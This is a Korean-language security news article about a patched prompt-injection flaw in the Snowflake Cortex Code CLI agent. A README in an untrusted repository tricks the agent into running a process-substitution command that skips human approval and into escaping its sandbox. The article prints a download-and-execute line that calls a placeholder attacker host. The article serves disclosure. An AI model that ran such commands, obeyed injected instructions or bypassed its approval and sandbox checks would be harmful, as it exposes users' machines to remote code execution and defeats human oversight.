Snowflake Cortex Code CLI 취약점으로 샌드박스 탈출 및 멀웨어 실행 가능

✍️ OpenClawRadar📅 게시일: March 19, 2026🔗 Source
Snowflake Cortex Code CLI 취약점으로 샌드박스 탈출 및 멀웨어 실행 가능
Ad

취약점 상세 정보

Snowflake Cortex Code CLI는 Claude Code 및 OpenAI의 Codex와 유사하게 작동하는 명령줄 코딩 에이전트로, Snowflake에서 SQL을 실행하기 위한 내장 통합 기능을 갖추고 있습니다. 출시 2일 후, Cortex Code의 명령 검증 시스템에서 취약점이 발견되었으며, 이로 인해 특별히 구성된 악성 명령이 인간 승인 단계를 트리거하지 않고 임의 명령을 실행할 수 있었으며, Cortex CLI의 샌드박스 외부에서 해당 명령을 실행할 수 있었습니다.

공격 체인

이 공격은 간접 프롬프트 인젝션을 통해 작동합니다. 사용자가 Cortex를 열고 샌드박스를 켠 후, 타사 오픈소스 코드베이스에 대한 도움을 Cortex에 요청합니다. 신뢰할 수 없는 저장소의 README에 숨겨진 프롬프트 인젝션이 Cortex를 조작하여 위험한 명령을 실행해야 한다고 믿게 만듭니다.

Cortex는 프로세스 치환 표현식 내부의 명령을 검증하지 못하여 악성 명령의 승인되지 않은 실행을 허용했습니다:

cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))

이 명령은 공격자의 서버에서 스크립트를 다운로드하여 실행합니다. 이 우회가 작동한 이유는 다음과 같습니다:

  • 프로세스 치환 <() 표현식 내부의 안전하지 않은 명령이 검증 시스템에 의해 평가되지 않았습니다
  • 전체 명령이 '안전한' 명령(이 경우 cat)으로 시작했습니다
  • 프로세스 치환 표현식 내부의 명령은 인간 승인을 트리거하지 않았습니다
Ad

샌드박스 우회

프롬프트 인젝션은 또한 모델을 조작하여 샌드박스 없는 명령 실행을 트리거하는 플래그를 설정합니다. Cortex는 기본적으로 샌드박스 없는 명령 실행을 트리거하는 플래그를 설정할 수 있으며, 인젝션은 이를 활용하여 악성 명령이 샌드박스 외부에서 실행되도록 허용합니다.

대응 조치

Snowflake 보안 팀은 이 취약점을 검증하고 수정하여 2026년 2월 28일에 Cortex Code CLI 버전 1.0.25로 수정 사항을 출시했습니다. Snowflake의 전체 권고 사항은 Snowflake 커뮤니티 사이트에서 확인할 수 있습니다: https://community.snowflake.com/s/article/PromptArmor-Report---Snowflake-Response

참고: 이 공격 체인은 샌드박스가 아닌 사용자에게도 적용되었습니다. 문서에 따르면 OS+일반 모드에서는 모든 명령이 사용자 승인을 요청합니다. 샌드박스에서 실행되는 명령에는 네트워크 및 파일 접근 제한도 있습니다.

📖 전체 소스 읽기: HN AI Agents

Ad

👀 See Also

ClawGuard: OpenClaw API 자격 증명 보호를 위한 오픈소스 보안 게이트웨이
Security

ClawGuard: OpenClaw API 자격 증명 보호를 위한 오픈소스 보안 게이트웨이

ClawGuard는 AI 에이전트와 외부 API 사이에 위치하는 보안 게이트웨이로, 에이전트 머신에는 더미 자격 증명을 사용하면서 실제 토큰은 별도로 저장합니다. 민감한 호출에 대해 Telegram 승인을 제공하고 요청의 감사 추적을 유지합니다.

OpenClawRadar
OpenClaw 보안 취약점: 2026.3.28에 패치된 치명적 프레임워크 결함
Security

OpenClaw 보안 취약점: 2026.3.28에 패치된 치명적 프레임워크 결함

앤트 AI 보안 연구소가 OpenClaw의 핵심 프레임워크에서 33개의 취약점을 식별했으며, 그중 8개의 심각한 문제가 2026.3.28 릴리스에서 패치되었습니다. 취약점에는 샌드박스 우회, 권한 상승, 토큰 취소 후 세션 지속성, SSRF 위험 및 허용 목록 저하가 포함됩니다.

OpenClawRadar
플라이트랩 공격은 적대적 우산을 사용하여 카메라 기반 자율 드론을 손상시킵니다
Security

플라이트랩 공격은 적대적 우산을 사용하여 카메라 기반 자율 드론을 손상시킵니다

UC 어바인 연구진이 카메라 기반 자율 표적 추적 시스템의 취약점을 악용하기 위해 페인트 칠한 우산을 사용하는 물리적 공격 프레임워크인 FlyTrap을 개발했습니다. 이 공격은 추적 거리를 위험 수준까지 감소시켜 드론 포획, 센서 공격 또는 물리적 충돌을 가능하게 합니다.

OpenClawRadar
리눅스 커널, PGP 웹 오브 트러스트 대체할 분산형 신원 시스템 제안
Security

리눅스 커널, PGP 웹 오브 트러스트 대체할 분산형 신원 시스템 제안

리눅스 커널 유지 관리자들은 현재의 PGP 웹 오브 트러스트를 대체하기 위해 Linux ID라는 분산 신원 계층을 개발 중입니다. 이 시스템은 W3C 스타일의 분산 식별자(DID)와 검증 가능한 자격 증명을 사용하여 개발자를 인증하며, 대면 키 서명 세션을 요구하지 않습니다.

OpenClawRadar